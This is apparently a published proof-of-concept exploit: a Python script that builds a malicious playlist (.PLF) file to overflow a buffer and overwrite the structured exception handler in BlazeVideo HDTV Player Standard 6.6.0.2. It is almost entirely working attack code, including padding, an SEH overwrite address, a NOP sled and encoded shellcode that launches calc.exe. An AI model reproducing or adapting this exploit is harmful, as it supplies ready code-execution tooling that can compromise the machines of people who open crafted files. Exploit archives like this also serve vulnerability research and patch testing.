# Exploit Title:BlazeVideo HDTV Player Standard 6.6.0.2 SEH Buffer Overflow # Date: 19-03-2013 # Exploit Author: metacom # RST # Vendor Homepage: http://www.blazevideo.com/hdtv-player/ # Download version 6.6.0.2: www.blazevideo.com/download.php?product=blazevideo-hdtv-std # Version: BlazeVideo HDTV Player Standard 6.6.0.2 # Tested on: Windows 7 German filename="poc.PLF" junk = "http://"+ "\x41" * 601 nseh = "\xEB\x06\x90\x90" seh = "\x5F\x17\x60\x61" #6160175F \EPG.dll nops = "\x90" * 20 #windows/exec CMD=calc.exe bad \x00\x0a\x1a shellcode= ("\xb8\xaf\x8c\x07\x94\xda\xcd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" "\x33\x31\x42\x12\x83\xea\xfc\x03\xed\x82\xe5\x61\x0d\x72\x60" "\x89\xed\x83\x13\x03\x08\xb2\x01\x77\x59\xe7\x95\xf3\x0f\x04" "\x5d\x51\xbb\x9f\x13\x7e\xcc\x28\x99\x58\xe3\xa9\x2f\x65\xaf" "\x6a\x31\x19\xad\xbe\x91\x20\x7e\xb3\xd0\x65\x62\x3c\x80\x3e" "\xe9\xef\x35\x4a\xaf\x33\x37\x9c\xa4\x0c\x4f\x99\x7a\xf8\xe5" "\xa0\xaa\x51\x71\xea\x52\xd9\xdd\xcb\x63\x0e\x3e\x37\x2a\x3b" "\xf5\xc3\xad\xed\xc7\x2c\x9c\xd1\x84\x12\x11\xdc\xd5\x53\x95" "\x3f\xa0\xaf\xe6\xc2\xb3\x6b\x95\x18\x31\x6e\x3d\xea\xe1\x4a" "\xbc\x3f\x77\x18\xb2\xf4\xf3\x46\xd6\x0b\xd7\xfc\xe2\x80\xd6" "\xd2\x63\xd2\xfc\xf6\x28\x80\x9d\xaf\x94\x67\xa1\xb0\x70\xd7" "\x07\xba\x92\x0c\x31\xe1\xf8\xd3\xb3\x9f\x45\xd3\xcb\x9f\xe5" "\xbc\xfa\x14\x6a\xba\x02\xff\xcf\x34\x49\xa2\x79\xdd\x14\x36" "\x38\x80\xa6\xec\x7e\xbd\x24\x05\xfe\x3a\x34\x6c\xfb\x07\xf2" "\x9c\x71\x17\x97\xa2\x26\x18\xb2\xc0\xa9\x8a\x5e\x29\x4c\x2b" "\xc4\x35") f = open(filename,"wb") f.write(junk+nseh+seh+nops+shellcode) f.close() print("Finish")